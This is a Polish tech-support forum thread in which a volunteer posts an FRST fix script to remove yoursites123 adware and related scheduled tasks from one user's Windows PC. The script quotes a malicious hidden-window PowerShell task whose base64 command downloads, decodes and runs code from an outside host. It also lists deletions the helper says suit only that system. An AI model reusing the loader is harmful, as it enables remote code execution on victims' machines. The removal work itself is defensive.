Skocz do zawartości
WAŻNE - Użytkownicy uprawnieni do pomocy
WAŻNE - Zakładanie tematu: obowiązkowe logi
Nadchodzące zmiany w logowaniu

Usuwanie yoursites123

PRZEMEK1

Przez PRZEMEK1
w Dział pomocy doraźnej

Rekomendowane odpowiedzi

Pomoc jest darmowa, ale proszę rozważ przekazanie dotacji na utrzymanie serwisu: klik.
picasso

picasso

Opublikowano
Opublikowano

Prócz tytułowego problemu, jest więcej aktywnych obiektów adware. Powinieneś także widzieć rozmaite reklamy, np. na Allegro.

 

Działania do przeprowadzenia:

 

1. Otwórz Notatnik i wklej w nim:

 

CloseProcesses:
CreateRestorePoint:
ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.yoursites123.com/?type=sc&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6
HKU\S-1-5-21-1157007284-3841837932-3106168173-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=130993241260851382&GUID=00000000-0000-0000-0000-000000000000
HKU\S-1-5-21-1157007284-3841837932-3106168173-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yoursites123.com/?type=hp&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://yoursites123.com/web?type=ds&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-1157007284-3841837932-3106168173-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://yoursites123.com/web?type=ds&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1157007284-3841837932-3106168173-1000 -> {szukaj.gazeta.pl} URL = hxxp://szukaj.gazeta.pl/internet/0,0.html?slowo={searchTerms}
BHO-x32: Brak nazwy -> {d00ab4cc-662c-40b6-a85f-d53086f4bb16} -> Brak pliku
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - Brak pliku
Toolbar: HKLM - Brak nazwy - {CC1A175A-E45B-41ED-A30C-C9B1D7A0C02F} - Brak pliku
Task: {278A9DBA-62D1-4376-9EA7-ED444CD029B4} - System32\Tasks\AdminShipkeeperXenolithsV2 => Rundll32.exe YardingConservatively.dll,main 7 1 
Task: {3A7FD0B5-4676-49CE-9E70-9ED19B714969} - System32\Tasks\{C25597C8-7C39-4F4A-893C-04C6732440F6} => pcalua.exe -a C:\Users\Admin\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=cornl
Task: {4EA137CC-4CCE-481A-98FB-901677621525} - System32\Tasks\{6C961D7F-9D78-4A55-8AE3-5F5C92C1DFAC} => Firefox.exe hxxp://ui.skype.com/ui/0/6.3.73.105.456/pl/abandoninstall?page=tsProgressBar
Task: {4EF62F18-F30D-45EF-BC3E-F00E781761FB} - System32\Tasks\{C4E1EAC5-EBC4-4145-ABC0-4530E24C3F04} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsPlugin
Task: {561026AD-BBB2-4EB8-B29D-48CA246F0762} - System32\Tasks\{70DA3F7B-9CA4-4C2E-AF83-7643DEB344E4} => pcalua.exe -a E:\westerner\setup.exe -d E:\westerner
Task: {611B9B6D-76FB-4B4B-B548-B153B94D009F} - System32\Tasks\{410AE0AC-A18D-4FE1-ABCD-70E2873239E8} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsPlugin
Task: {6C519167-262A-4200-9BBB-ED0FA27AD2DC} - System32\Tasks\{73BE4A54-9082-4DA1-83D9-A314C418D544} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.73.106.456/pl/abandoninstall?page=tsWLM
Task: {9091ECCC-0947-4AB5-97A3-F4F7B63BC278} - System32\Tasks\{0F7F7947-050A-797E-7A11-7A090F79117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAZQBjAHUAcgBlAGIALgBpAG4AZgBvAC8AdQAvAD8AYQA9ADMAZgB0AGMAWQB5AFYANwAzAHgAcABPAEoAdAAxADkANwBjAFEASQB1AHMAWQBKAGYAbgBBADEAbABjAE8AMgBSAGcAcABpAG4ASgBzAEQAVwBQAGsAQgBBADAARQBrAEsAMwBHAEUAeQBoAEEAYQBrAHIATQBOAF8AMQBLADcAbgBSAGIAWQBoAFMAUQBoAGkAXwBYAHAAbwBjAFIASwBRAEMATABqAFMAdgBxAEEAYwB5ADUAawAzAEQAMgA0AFIAdgB4AHAASwBpAFkASgBmAHoAbwBLADUAVABOAFoAeQBEAEEASQBwAEQATABfAEEAZgBLAEoAcABkAEUAbABUADQAXwBhAFEASgBFAGMAbwB6AEMAQQBJADUAbQBCAGYATABIAEQASABYAFkAcQBwAHMAcQBEAEoAdgByAEoARABHAHUAWABJADUAeABCAHgAawB5AFQANgBjAGIASgAyAGMAaQAwAHUAQQBqADIANwBZAEsALQBZAHkAYwBFADkARwBkAHoARgBHAEoAWABhADMAZABTAGMAQgBGAGIALQA1ADEATwAtAG8ALQBPAFIAdQBwAGEAbgBHAHAAYQBQADIAaABOAG0AcAA5AHoAbQA0AHAAMAA4AEYAeQB4AEEAdwBIAFEAVwBmADcAUgBXAHUANwBRAGkAZwA0ADkAVwBpAG4AWQBLAGkAOAAyAEgAaQBDADMAbwBCAG4AWAAtAFEARQBKAEsAdwBIAHgAMABZADAASQB6AFkAVwBvAEEAagB4AFQATABTAFIAeAB5AFQAQQByAEcAawBoAGMARABGAEgAdgBIAEkAMQBwAEoAdQB3AEQANABGADMAbwBEAEsAeQBtADgATgBkAEkAWgAtAEQATQAwAGMAUwBYADAAMgBiADEALQBkADUAYgAyAG0AaAB0AFQAZwBHAEIARQBoAEYAQgB1AEMAQwBwAEUAWABQAHkAZABpAGcAdwB5AGEAcABZAHgATgB0AEsATAB4AHMAaQBQAHQATABNAHAAcAA0AGoAegBSAFEARABWADQAUwBuAHEAbgBfAEoASABEAGcAMgBmAE0AdgB1AFcARgBNAF8ATgBCADkANAB4AHcARAA2AEEAegAtAEMARQBJAF8ARwBfADAAcAB4ADUAUQBxAGIAUABkAEoAagBHADcATwBZAGsAcQB0AFkAVwBlADcANQBKAHUAVAAzAFEAUQBCADEAawBCAFcAbABVAEMATABIADEAcABpAGoANQBZAFYAVwBlAHAAcQBPAFUAOQA1ADQAeABQAEYAMABCAHMAawBjAEQAbwBQAGIAagBVAGoAeABJADQAZwBGAFYAWgBVAG0AdgBNAFAALQB3AEEAcABiAHcAdgBuAFMATgBGAHIAMwAyAF8AYwAyAEYAcwA1ADMAMwBTAFoAdgA2AFgAQwA3AFMAeABpAHkAUABlAGcAYQBUAFQAQwBTAEYAUABVADMAZQBDAEQAZwBRAHUAWgAwAGYARQBFAC0AUABNADAAOABDADIAVABnAGgAUwB6AC0AaQB5AEsAaABZAEEARgA0AEUAeQA3AHEATwB0AHEAZQA2AEwARAB3ADIATwBuAGkAcgBiADAAdAAyAG8AcwA1AEMAWAB4AF8AcABQAE4AYwBPADkAbwBvADMAdAB0AEgARwBfAEkAaQBhAGYAQQBPAHYAcABaAGkAcwBlAEQAUgB4AFAAeQAyAHUALQA4AEkAXwBtAHMARgAxAEMAMQA2AFcARwBlAFUAQwB0AHQALQBtAGcANgB6AFMAdQBtAGwAcABJAGgARQBGAEwAOQAwAEMAMQB1AHcAWQA5AEUANgBnADUAbgBGAEYANABkAGcAMABVADMAcQBsAFUAbABfAHYAVwBDAHkARgBCAEIAdwBGAGsAQQBWAHcAaAB6AEQASgByADMAMQBNAEQASgAzAEMAcwBVAEoAMwBCAGMAXwBMADEARwBJAFcASgBtAFYAUwBpADUAVABFAGkARgBkAHkAdQBkAHcAMgBzAEMAaAA3AHcALQBMAE4AYQBFAEcANQBvAHMAagBDAEEAeQB5ADUALQBwAG0AdwBhAFYAdwBoAG0AeABBAGUAMQBjAFMANABuADUAcABzAFQAegBfAGEANQBfAEgAaQBoAEkAZgBKADkAcQAxAGYAYQBIAHYAaABaAGEAUQB0AGwAMABJAFQAQQBQAEUAcQBUAGUAbAAtAHcARwBlAHoANQBpADIAdgB5AFUAcgBjAF8AYwAyAGMAdwB4AEEAeQA4AGIAbgAzADIAUgB5AEkAUgBWAEMAbgBGAFoAbQBaAEIAMwAwAHMAcQBWAEUANQB5ADQANwBZAFIANwBqADcAZwA3AFQAZgBNADcAagBRADkAawB5ACYAYwA9AEMAUABaADAASAA1AEkANQBxAFQAcQBuAFEAMgBVADIAZAA0AFEAWQAtAFcARQB5AE8AUQBGAE8AYwBRAHAAegAwAEIAWgBLADYAUgBTAHkAVgBRAEUAYQBSAEEAXwBtAFIARwBZAGUAUgBhAEIAZwBOAC0AZAAwADgAWgB4ADcATwBWAGIAUwB3AEgARwBlADkATABlAEIASgBQADgAVgBIAHcAdQBGAHYANwBtAFYAVgBZAEcAdAB4AHcARQBUAHYAUABnAHEAaQAzAG8AQQBxAEUAdQB2AHEATQBWAHoAVABpAGwANABIAHEAZgBkADYAXwB5ADIASAAxAFMASABiAEIAUwBhADAAWAA2AEcAcQBSAHAAcQBIAG4AeQB4AG8AdgBHAE0AMgBRAE4AOAAxADIAZABrAG8ANQBiAGQAOQBzAFUATABEAGwATQB2ADIAeABkADkAYgBEAFAATQB5AEYAMABFAHgAWABmAHYAVAA1ADQAUgBDAFIARwBEAGUAdABpAEEAVAB2ADIASgBaAGsAeQB5ADEAdAAzAGoAZwB5AHUAZwBRAFQAQQBrADEAYwB6ADcAYQBEAHoAQwBNADcATgAwAHcAXwBUAGkATQByADAANABEADYAUwBpAEMATwBwAHcAMgB5ADIAcwBiAGoAUQBpAHgAdQBfAGgAZAA2AHMAagBfAHoASwBQAHoALQBoAEwAWABKAC0AUAB5AHkAUQA1AEgAawBNAFQALQBXAEMAbgBFAGIAVwBiAFIAcwB2AGYARQBZAEEARABOAGwAMABSAE8AUABxAHQAMwBHADAATQBmAEwAYgA4ADMASQBQAGsAMgBmAGwANwBCAHUATgA0AGYAUgBwAFcAdABVADcAVgBuAHoAXwA2AFIATgBKAHEAagBiAFAAQQBfAGIAZABHAHoAcQBVADIAagBSAHkAQwBhAGkAMABzAHMAQgBCAGcAUAAxAHEAQQBRAEkAOQBEAHoAcABWAE4AbQB3AEMAUgBEAG0AcQBrADcAbABEADMAeABqAFAAMgBwAFoAVgB6AFoAOABmAEkALQBRAHkAVQBFAGoARgBSAEkATwBvAE0ARwBrAEQAUQA2AEcAVQBOAFoATQBZAEoAWQBrADYAdABUAC0AUwAzAGcATgAwADIAWABLAFYANwA3AE4AeQB0AFkAbgBwAHEANwA5AG8ANwAzAF8AVQAyAHMAbQBvAE4AcQBsAGoASwBaAF8AawB1AG4AVABMAG0AbwB1AFQAYgA4AFQASQA5AEcAMgBPAEQAUQBjAEgARQBMAFEATgBjAE0AYQB6AGcAMQBpAEgAUAB6AGIAMABIAEMAOABqAGwAQgA3AG8AMwBUAGEAWgBfAGYAdQBJAF8AUwBrAFYAQgBoADEAdgBXADUAQgBUAG8AdgBvAFIALQBtAEIAcwBKAGoAOQBMAGQAegBEADIATABuAEEALQBiADcAagB2ADcAagBTAGgAQQBzAHcAUgBkAEUAUwBMAHEAaQBJAEoAMwBHAEwAQwBrAGgAcQBsAFYAZABQAEMAegBEAEUAVQAwAGwASwBRAHcAYwBpAFcARwBPAHIALQBhAGUANwAxAHcAUQBWAC0AbgBGAGsANgB3AFoAZQA4AEcAUQA5AFQATQBkAEQAawBtAEcATQBEAHUAcgBtAGIAQwBoADgAaABwAC0ARQB3AEgALQBXAEsARQBIAG4AdQBkAHUAcwB5ADEAcwBEAFYAcABPAGkAbwBGAHEAZQBlADEAXwA5AGgATwBMAGUANgB6AHUANQBuAC0AXwAzAHEAMgB5AGwAUgBDAFUAUAB2AHcAbABnAFUAVgAwAEQARwA0AGcARgBBAEsAcABjAEUANQAzAHYAUQA2AEMAcwBRADAARQBNADkARABUADgAdQBuAHcANABaAHEAZwA5ADQAaABnADUAcABqAGYAawBuAEcAVABRAEcAZQBwAHAAVgBlAEoAWQBoAEcAcwBoAGMAVwB6AHQAeQBXAFMAYgBHADIASwB3AFUAYgB5AHEAMgBJAGwARQA0AFUALQBIAG0AQgAwAEIAMAB0ADUAWQBnAGoAQwBkAHIAawBYAGgARABsAHkAUAB0AFgAcQBkAGcATgBzAGUANgBZAGwATABvAHkAbgAxAHoAQwBkAEcAaQBFAGsAbABsADEAcABfAEUAbgBjAHAAcgB1AFEANwBkAGwAOABRAHkATwAtAG8AbwBLAGcAegBXAGUAOABRADUAeABwAEEAMgB3AE0ASgBLAFQASwBYAGIAYwBjAGEAQQBEAG8ASgBjAFMAWgBIAGQAcgBsAGgAQgBQAEIAeAA0AF8AdgByAEIANABBAFUANwAxAHEAbgBBAEwAdQBiAEMAcgB5AFoAQgBvAEYAUQBmAHQAZwBkADEALQBXAGMAWAByAGsAWQBfACYAcgA9ADEANwA1ADMAMwA2ADYAMwA3ADUANwAwADkAOQA5ADYAMwAwADcAIgA7ACQAcwB0AHMAawA9ACIAewAwAEYANwBGADcAOQA0ADcALQAwADUAMABBAC0ANwA5ADcARQAtADcAQQAxADEALQA3AEEAMAA5ADAARgA3ADkAMQAxADcAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAFEAMwA0AFYAMwBVAFUAUQAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {BEE6820B-A5D5-45E6-AB6A-D5A4331B3475} - System32\Tasks\{B399420A-560F-4B7C-B3BD-F85BA49AEDAE} => Firefox.exe hxxp://ui.skype.com/ui/0/6.3.73.105.456/pl/abandoninstall?page=tsProgressBar
Task: {C1C71FE9-F10E-4D9C-A5B7-ED922E21FB3A} - System32\Tasks\{9CFB0D6C-72B7-4916-92F8-2A43298E80F1} => pcalua.exe -a E:\DATA\Install.exe -d E:\DATA
Task: {D7C0029C-1B7F-40A9-827E-8E6A1A46B1DC} - System32\Tasks\Price Fountain => C:\Users\Admin\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE 
Task: {F988A5E4-06EB-44F6-94CB-F946CD5678B8} - System32\Tasks\{E993273D-4EFE-4CEA-BCED-7F3E95AB859E} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsMain
Task: C:\Windows\Tasks\Price Fountain.job => C:\Users\Admin\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE 
DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I
DeleteKey: HKCU\Software\dobreprogramy
DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PriceFountain
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\yoursites123Software
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\yoursearching uninstall
RemoveDirectory: C:\Program Files (x86)\Free PDF to Word Doc Converter
RemoveDirectory: C:\Program Files (x86)\WinZipper
RemoveDirectory: C:\ProgramData\e9d408a6-1113-1
RemoveDirectory: C:\ProgramData\e9d408a6-4d47-0
RemoveDirectory: C:\ProgramData\e9d408a6-53b1-0
RemoveDirectory: C:\ProgramData\e9d408a6-6ea5-1
RemoveDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ares
RemoveDirectory: C:\Users\Admin\AppData\Local\Gameo
RemoveDirectory: C:\Users\Admin\AppData\Local\Mozilla
RemoveDirectory: C:\Users\Admin\AppData\Local\ShipkeeperXenoliths
RemoveDirectory: C:\Users\Admin\AppData\Roaming\Gameo
RemoveDirectory: C:\Users\Admin\AppData\Roaming\GoldenGate
RemoveDirectory: C:\Users\Admin\AppData\Roaming\Mozilla
RemoveDirectory: C:\Users\Admin\AppData\Roaming\PriceFountain
RemoveDirectory: C:\Users\Admin\AppData\Roaming\TSv
RemoveDirectory: C:\Users\Admin\AppData\Roaming\WinZipper
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware\Tools\Malwarebytes Anti-Malware Chameleon.lnk
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Ares.lnk
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Play Games Online.url
C:\Users\Admin\Desktop\Continue WinRAR installation.lnk
C:\Users\Admin\Desktop\sh-remover.exe
C:\Windows\SysWOW64\pl.html
CMD: netsh advfirewall reset
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

2. Napraw uszkodzony specjalny skrót IE. W pasku eksploratora wklej poniższą ścieżkę i ENTER:

 

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools

 

Prawoklik na zlokalizowany tam skrót Internet explorer (bez dodatków) > Właściwości > w polu Element docelowy po ścieżce "C:\Program Files\Internet Explorer (x86)\iexplore.exe" dopisz dwie spacje i -extoff

 

3. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Odnośnik do komentarza
  • 1 miesiąc temu...
picasso

picasso

Opublikowano
Opublikowano (edytowane)

Jeśli chodzi o punkt 2, otwierasz dowolny folder, w pasku adresów klikasz by podświetlić całą ścieżkę, wklejasz podaną przeze mnie i ENTER. W folderze jest plik Internet explorer (bez dodatków), prawy klik na niego i edytujesz zgodnie z wytycznymi.

 

Po wykonaniu operacji podaj raporty o które prosiłam.

Edytowane przez picasso
Temat zostaje zamknięty z powodu braku odpowiedzi. //picasso
Odnośnik do komentarza
Gość
Ten temat został zamknięty. Brak możliwości dodania odpowiedzi.
Tematy

  • Ostatnio przeglądający   0 użytkowników

    • Brak zarejestrowanych użytkowników przeglądających tę stronę.
×
×
  • Dodaj nową pozycję...